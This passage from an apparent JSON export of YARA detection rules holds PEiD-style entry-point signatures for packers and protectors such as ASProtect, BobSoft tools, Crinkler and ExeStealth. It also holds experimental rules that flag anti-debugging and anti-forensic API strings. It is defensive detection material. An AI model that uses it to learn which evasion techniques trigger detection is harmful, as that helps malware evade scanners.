04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 00 00 E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_130824_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 F0 58 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_122_123_Beta_21_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 E0 46 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 117,
            "key": "yara_detect_bobsoft",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Bobsoft",
            "rule": "rule PEiD_Bundle_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_With_Unpack_Code_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Imploder_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 73,
            "key": "yara_detect_closehandle",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_CloseHandle",
            "rule": "rule Detect_CloseHandle: AntiDebug {\r\n    meta: \r\n        description = \"Detect CloseHandle as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtClose\" fullword ascii\r\n        $2 = \"CloseHandle\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
        },
        {
            "id": 111,
            "key": "yara_detect_crinkler",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Crinkler",
            "rule": "rule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 42 00 31 DB 43 EB 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 74,
            "key": "yara_detect_csrgetprocessid",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_CsrGetProcessID",
            "rule": "rule Detect_CsrGetProcessID: AntiDebug {\r\n    meta: \r\n        description = \"Detect CsrGetProcessID as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"CsrGetProcessID\" fullword ascii\r\n        $2 = \"GetModuleHandle\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
        },
        {
            "id": 83,
            "key": "yara_detect_eventlogtampering",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_EventLogTampering",
            "rule": "rule Detect_EventLogTampering: AntiForensic {\r\n    meta: \r\n        description = \"Detect NtLoadDriver and other as anti-forensic\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtLoadDriver \" fullword ascii\r\n        $2 = \"NdrClientCall2\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
        },
        {
            "id": 75,
            "key": "yara_detect_eventpairhandles",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_EventPairHandles",
            "rule": "rule Detect_EventPairHandles: AntiDebug {\r\n    meta: \r\n        description = \"Detect EventPairHandlesas anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"EventPairHandles\" fullword ascii\r\n        $2 = \"RtlCreateQueryDebugBuffer\" fullword ascii\r\n        $3 = \"RtlQueryProcessHeapInformation\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
        },
        {
            "id": 71,
            "key": "yara_detect_exceptionhandler",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_ExceptionHandler",
            "rule": "rule Detect_SuspendThread: AntiDebug {\r\n    meta: \r\n        description = \"Detect SuspendThread as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"UnhandledExcepFilter\" fullword ascii\r\n        $2 = \"SetUnhandledExceptionFilter\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
        },
        {
            "id": 104,
            "key": "yara_detect_exestealth",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Exestealth",
            "rule": "rule ExeStealth_WebToolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 